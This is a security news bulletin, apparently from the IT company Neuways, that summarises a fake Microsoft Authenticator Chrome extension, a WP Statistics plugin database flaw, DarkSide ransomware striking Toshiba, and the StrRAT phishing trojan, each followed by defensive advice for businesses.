Neu Cyber Threats – 27th May 2021
Users of the Google Chrome web browser need to be wary of installing extensions from the Chrome Web Store for their browsers, as it has been reported that a false Chrome add-on claiming to be a “Microsoft Authenticator” is available. Hundreds of people have already downloaded the extension, believing it to be a legitimate add-on but are really exposing their information to cyber criminals.
To make matters worse, the extension uses both the name and branding of the legitimate Microsoft Authenticator app has managed to bypass Google’s security systems and even accrued a score of three out of five stars that makes it look even more legitimate.
Close inspection of the extension’s entry in the Chrome Web Store would, in an ideal world, have raised suspicions amongst potential downloaders: the add-on claimed to have been uploaded by “Extensions” rather than the “Microsoft Corporation” you would normally expect, and contact details pointed to a Gmail account, rather than Microsoft’s own domain.
A further look at the reviews of the extension would have also raised alarm, as some of them warned anyone considering downloading the extension of the danger, whereas other reviewers, presumably fake, were full of praise for it.
If users downloaded the extension, they are directed to a Polish webpage that redirects to a further webpage automatically asking for a sign-in or creation of an account.
The extension has since been removed from the Chrome Web Store by Google, but it is a new type of threat that web users should be aware of engaging with. It is thought the hundreds of people affected may have given up access to their corporate networks, if they indeed filled out the phishing page with their account information.
As users become more aware of multi-factor authentication (MFA) and its many, many benefits, it is important to remember to always double check any applications or extensions to your browser that you download. It could just be the case that they aren’t what they seem.
A WordPress plug-in is allowing cyber criminals to steal database information without even being logged in to the website itself. WP Statistics, a plug-in installed on over half a million WordPress websites, has a security vulnerability that could let site visitors gain all kinds of sensitive information from web databases, including emails, credit-card data, passwords and more.
WP Statistics is a plug-in that delivers analytics for site owners, including how many people visit the site, where they’re coming from, what browsers and search engines they use, and which pages, categories and tags have the most visits. It also delivers anonymised data around IP addresses, referring sites, and country-and city-level details for visitors, presented in charts and graph formats.
Researchers found the high-severity bug in the “Pages” function, which allows administrators to see which pages have received the most traffic. It returns this data to a back-end database – which it turns out unauthenticated attackers can hijack to perform their own queries, in order to attain sensitive information.
Exfiltrating information would be a relatively slow process, but high-value information such as user email addresses, passwords and encryption keys could be extracted in a matter of hours with the help of automated tools. In a targeted attack, this vulnerability could be used to extract personally identifiable information from commerce sites containing customer information.
Neuways advises WordPress users update the WP Statistics plug-in with a patch that was recently issued for it. This kind of vulnerability also underscores the importance of having security protections with an endpoint firewall in place wherever sensitive data is stored. Otherwise your business could be subject to a data breach, with not only data to be lost, but monetary loss too, in the form of fines from the Information Commissioner’s Office, if any GDPR rules are found to have been broken.
The DarkSide ransomware group are continuing to make their mark on businesses around the world. Recently responsible for the Colonial Pipeline attack in the USA which curtailed oil operations across the country, they have struck again – this time affecting European subsidiaries of Toshiba.
Some of Toshiba’s networks were shut down as a result, demonstrating how effective ransomware attacks can be to steal revenue from businesses of all sizes. While it seems no customer-related information has been leaked externally, it is possible that the malicious actors from the ransomware group could have leaked some information on the Dark Web.
If a malicious actor has access to a network and can encrypt business-essential data, they could cripple the company’s daily operations by causing downtime which would result in a large revenue loss. Ransomware attacks are proven to be difficult to recover from. At Neuways we’d advise every business, regardless of its size, to have a multi-layered Business Continuity & Disaster Recovery plan in place. This would mean in the event of a ransomware attack, your business would be able to rely upon its regularly backed up data to remain operational and would not have to suffer long periods of inactiveness due to the downtime.
- A strong password policy: do not reuse passwords, have a minimum password history, enforce password strength policies, ensure that passwords are not recycled and consider a Password Manager.
- Keep systems patched with the latest security updates
- Ensure services such as RDP are not open to the internet
- Install Endpoint Protection, which stops malicious scripts from running both on disk and in memory.
Microsoft researchers have found an email phishing campaign which is delivering a Java-based remote access trojan (RAT) that can steal credentials and take control of systems, while presenting as fake ransomware.
The StrRAT malware is a Java-based remote access tool which steals browser credentials, logs keystrokes and takes remote control of infected systems—all typical behaviours of RATs. The malware also has a module to download additional payloads onto the infected machine based on command-and-control (C2) server command.
To make matters worse the StrRAT also has a unique feature uncommon for this type of malware: a ransomware encryption/decryption module. This module changes file names in a way that would suggest encryption follows the next step. However, the malware actually stops short of this function, instead appending the file name to files without actually encrypting them. It’s not yet known the reasons why this occurs.
Cyber criminals launch the campaign by using compromised email accounts to send several different phishing emails. Some of the messages use the subject line “Outgoing Payments.”, while others refer to a specific payment supposedly made by the “Accounts Payable Department,”. These are just some of many different emails that use social engineering around payment receipts from recipients they recognise to encourage victims to click on an attached file that appears to be a PDF, but which actually has malicious intent.
The attached file in all these cases, however, is not a PDF at all, but instead connects the system to a malicious domain to download the StrRAT malware, which then connects to an external controlling server.
Neuways advises businesses to maintain their awareness when dealing with any suspicious looking incoming emails. Always look for poor grammar, an unrecognised sender and urgent action to be taken. Don’t click on to a hyperlink or open a PDF unless you’re expecting to receive such a communication.